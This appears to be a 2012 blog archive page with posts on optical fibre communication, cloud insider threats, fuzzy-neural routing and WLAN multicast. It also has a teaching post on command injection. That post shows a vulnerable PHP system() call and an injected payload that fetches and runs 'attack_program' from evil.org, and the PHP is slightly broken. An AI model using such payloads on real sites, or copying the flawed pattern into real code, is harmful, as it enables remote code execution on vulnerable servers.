Archive for October, 2012

Optical communication networks and devices

Optical communication is used taken to mean devices that transmit data by sending pulses of light through an optical fibre. The light forms an electromagnetic carrier wave that is modulated to carry information. First developed in the 1970s, fibre-optic communication systems have revolutionized the telecommunication industry and have played a major role in the advent of the information age. Because of its advantages over electrical transmission, optical fibre is rapidly replacing copper wire in core networks in the developed world and is key for developing countries in bridging the digital divide.

Traditionally, optical devices include items such as polarizers, wave plates, reflectors, filters, and lenses. However, when we consider the concept of communication in optical devices, the scope widens to encompass beam-splitters, photo transistors, laser diodes and more, including:

  1. light emitters and receivers;
  2. linear image sensors;
  3. optoelectronic devices; and
  4. photodetectors.

The main advantages of using optical technologies in communication systems are that the high frequency of the optical carrier enables significantly more information to be transmitted over a single channel than is possible with a conventional radio or microwave system. Optical components are much smaller and lighter, with the additional benefit of consuming less power. Since energy conservation is gaining increasing interest nowadays, the energy-saving characteristics of optical technologies represent huge opportunities for reducing the carbon footprint of ICTs.

The communication process using optical fibre involves the following basic steps (shown in Figure 1):

  • creating and encoding the optical signal involves the use of a transmitter – lasers and light-emitting diodes (LEDs) are generally used for this purpose;
  • transmitting the signal along the fibre;
  • ensuring that the signal does not become too distorted or weak, hence the use of amplifiers; and
  • receiving the optical signal and converting it into an electrical signal using an optical receiver.

Figure 1: Basic steps in optical communication

Wavelength division multiplexing (WDM) can optimize the potential high bandwidth of optical fibres by enabling several distinct data signals to share a single fibre, provided that they have different wavelengths. Multiple wavelengths are therefore multiplexed into a single optical fibre and multiple light-path data are transmitted (See Figure 2).

Figure 2: Wavelength Division Multiplexing (WDM), functional model

Current communication networks using optical fibre still need to convert the electrical signal into an optical one for transmission, and then back into electrical form at the receiving end. Thus, the potential bandwidth of optical fibres is not being fully exploited. Therefore, future research and standardization work will be focused on developing purely optical devices for communication networks.

Advertisements

, , , , , , , , , , , , , , , , ,

Leave a comment

Threat: Malicious Insiders

The threat of a malicious insider is well-known to most organizations. This threat is amplified for
consumers of cloud services by the convergence of IT services and customers under a single management
domain, combined with a general lack of transparency into provider process and procedure. For example,
a provider may not reveal how it grants employees access to physical and virtual assets, how it monitors
these employees, or how it analyzes and reports on policy compliance. To complicate matters, there is
often little or no visibility into the hiring standards and practices for cloud employees. This kind of
situation clearly creates an attractive opportunity for an adversary — ranging from the hobbyist hacker,
to organized crime, to corporate espionage, or even nation-state sponsored intrusion. The level of
access granted could enable such an adversary to harvest confidential data or gain complete control over
the cloud services with little or no risk of detection.

Impact

The impact that malicious insiders can have on an organization is considerable, given their level
of access and ability to infiltrate organizations and assets. Brand damage, financial impact, and
productivity losses are just some of the ways a malicious insider can affect an operation. As
organizations adopt cloud services, the human element takes on an even more profound importance.
It is critical therefore that consumers of cloud services understand what providers are doing to
detect and defend against the malicious insider threat.

Remediation

  1. Enforce strict supply chain management and conduct a comprehensive supplier assessment.
  2. Specify human resource requirements as part of legal contracts.
  3. Require transparency into overall information security and management practices, as well as compliance reporting.
  4. Determine security breach notification processes.

, , , , , ,

Leave a comment

Command Injection

A successful command injection attack gives the attacker complete control of the remote system.

When user input is used as part of a system command, an attack may be able to inject system commands into the user input. This can happen in any programming language; however, it is very common in Perl, PHP, and shell based CGI. It is less common in Java, Phython, and C#. Consider the following PHP code snippet:

<?php
$email_subject = “some subject”;
if ( isset($_GET{’email’})) {
system(“mail ” + $_GET{’email’}) + ” -s ‘” + $email_subject +
“‘ < /tmp/email_body”, $return_val);
}
?>

The user sends his or her e-mail address in the email parameter, and that user input is placed directly into a system command. Like SQL injection, the goal of the attacker is to inject a shell command into the email parameter while ensuring that the code before and after the email parameter is syntactically correct. Consider the system() call as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle piece in the middle to finish it off:

mail [MISSING PUZZLE PIECE] –s ‘some subject’ < /tmp/email_body

The puzzle piece needs to ensure that the mail command runs and exits properly. For example, mail –help will run and exit properly. Then the attacker could add additional shell commands by separating the commands with semicolons (;). Dealing with the puzzle piece on the other side is as simple as commenting it out with the shell comment symbol (#). Thus, a useful puzzle piece for the email parameter might be this:

–help; wget http://evil.org/attack_program; ./attack_program #

Adding this puzzle piece to the puzzle creates the following shell command:

mail –help; wget http://evil.org/attack_program;
./attack_program # s ‘some subject’ < /tmp/email_body

This is equivalent to this:

mail –help; wget http://evil.org/attack_program; ./attack_program

This runs mail –help and then downloads attack_program from evil.org and executes it, allowing the attacker to perform arbitrary commands on the vulnerable web site.

, , , , ,

1 Comment

Fuzzy Neural Network for Routing

Consider the computer network in Figure 1.11. Suppose a message needs to be sent from
node A (source) to node G (destination). The first decision faced by the routing algorithm at
node A will be to determine if the message should be transmitted through node B (link 1),
node C (link 2) or node D (link 3). Determining a value for each of those three possible
outgoing links will make this decision. These three values, computed by the proposed routing
strategy, will represent the expected time to destination via node B (link 1), node C (link 2)
and node D (link 3). These three time values will be compared and the link that gives the
shortest expected time will be chosen as the first link in routing the message to the destination
(node G).

Figure 1.11: Example computer network

The expected time value for every outgoing link will be determined through the use of
fuzzy logic and a neural network, using information specific to each outgoing link as
described in the previous section (distance, throughput, congestion and failure state). Each of
our four metrics was described earlier with three concepts. For example, distance could be
short, medium, or long. Although illustrated on the same graph in our figures because they
pertained to the same concept, these actually represent separate fuzzy sets. That is, “short
distance” is one fuzzy set. It happens to overlap with “medium distance” which is another
fuzzy set. For a particular outgoing link and destination, we might have membership grades
of 0.0 for “short distance”, 0.4 for “medium distance”, and 0.8 for “long distance”, meaning
that the distance tends to be slightly more long than medium for this route. The source node
will maintain a fuzzy neural network that will assess the time required for the data to reach
the destination via that particular link. Therefore, this membership grade information needs
to be conveyed to the neural network for each of our four metrics. Thus, three fuzzy sets for
each of four metrics results in twelve fuzzy sets for each link considered (see Table 1.0).

Table 1.0 : Twelve fuzzy sets

Data for a particular link (distance, throughput, congestion, failure) will be transformed
into twelve fuzzy membership grades, one for each of the fuzzy sets, thus resulting in twelve
inputs to the neural network. In addition to the twelve fuzzy membership grades, there will be
two additional inputs to the neural network, namely the packet size and destination of the
message. The neural network design is illustrated in Figure 1.12.

Figure 1.12: Neural network design

When node A’s controller (Figure 1.11) determines the best link to use from among link1,
link 2 or link 3, the neural network will be invoked three different times using three sets of
inputs to get three expected time values. These three time values are then compared to find
the link that will give the lowest expected time to reach the destination. That will be the link
chosen to send the message along. When the message arrives at the next node, the same
process will be repeated using a similar neural network for all outgoing links of that particular
node. This procedure continues until the destination node is reached. A similar, but not
identical, neural network will be present at each node of the computer network. This
dissertation will establish the advantages of this routing strategy by testing it at a single source
node. Results obtained with this neural network can easily be generalized to all nodes on the
computer network.

, , , , , , , , , , ,

Leave a comment

Multicast for Multirate Wireless LANs

Most research efforts on multicasting in IEEE 802.11 WLANs have focused on improving the
service reliability by integrating ARQ mechanisms into the protocol architecture. In, the
Leader-Based Protocol (LBP) ARQ mechanism has been introduced to provide the multicast
service with some level of reliability. To address the ACK implosion problem, LBP assigns
the role of group leader to the multicast receiver exhibiting the worst signal quality in
the group. The group leader holds the responsibility to acknowledge the multicast packets
on behalf of all the multicast group members, whereas other MTs may issue Negative
Acknowledgement (NACK) frames when they detect errors in the transmission process.

The 802.11MX reliable multicast scheme described in uses an ARQ mechanism supplemented by
a busy tone signal. When an MT associated to a multicast group receives a corrupted packet,
it sends a NACK tone instead of actually transmitting a NACK frame. Upon detecting the
NACK tone, the sender will retransmit the data packet. Since the 802.11MX mechanism does
not need a leader to operate, it performs better than the LBP protocol in terms of both
data throughput and reliability. However, this mechanism is very costly since it requires
a signaling channel to send the NACK frames and busy tones. Moreover, both LBP and
802.11MX schemes do not adapt the multicast PHY rate to the state of receivers.

Very recently, the RAM scheme has been proposed in for reliable multicast delivery.
Similar to the LBP and 802.11MX schemes, the transmitter has first to send a RTS
frame to indicate the beginning of a multicast transmission. However, in RAM the RTS
frame is used by all the multicast receivers to measure the Receiver Signal Strength
(RSS). Then, each multicast receiver has to send a variable length dummy CTS frame
whose length depends on the selected PHY transmission mode. Finally, the transmitter
senses the channel to measure the collision duration and can adapt the PHY rate
transmission of the multicast data frame accordingly. This smart solution is more
practical than 802.11 MX since it does not require a signaling channel but still
requires the use of RTS/CTS mechanism and targets reliable transmission applications.

In SNR-based Auto Rate for Multicast (SARM) is proposed for multimedia streaming
applications. In SARM, multicast receivers measure the SNR of periodically broadcast
beacon frames and transmit back this information to the AP. To minimize feedback
collision, the backoff time to send this feedback increases linearly with the
received SNR value. Then, the AP selects the lowest received SNR to adapt the
PHY rate transmission. The main problem with this approach is that the transmission
mode cannot be adapted for each multicast frame. The multicast PHY rate of SARM is
adapted at each beacon intervals. SARM does not make use of any error recovery
mechanism, such as, data retransmission.

Note that at the exception of RAM and SARM, the mechanisms just described above
only focus on solving the reliability of the multicast service in WLANs. Only
RAM and SARM adapt the PHY transmission rate of the multicast data frames.
In this paper, we define an architecture by integrating the following
facilities: 1) the optimal channel rate adaptation of the multicast service in
IEEE 802.11 WLANs, 2) a more reliable transmission of the multicast data, 3)
the limitation on the overhead required by the signaling mechanism, and
4) the support of heterogeneity of receivers by using different multicast
groups and hierarchical video coding. The definition of the proposed cross layer
architecture is based on the multirate capabilities present in the PHY layer of
IEEE 802.11 WLANs.

, , , , , , , , , , , , , , ,

Leave a comment

%d bloggers like this: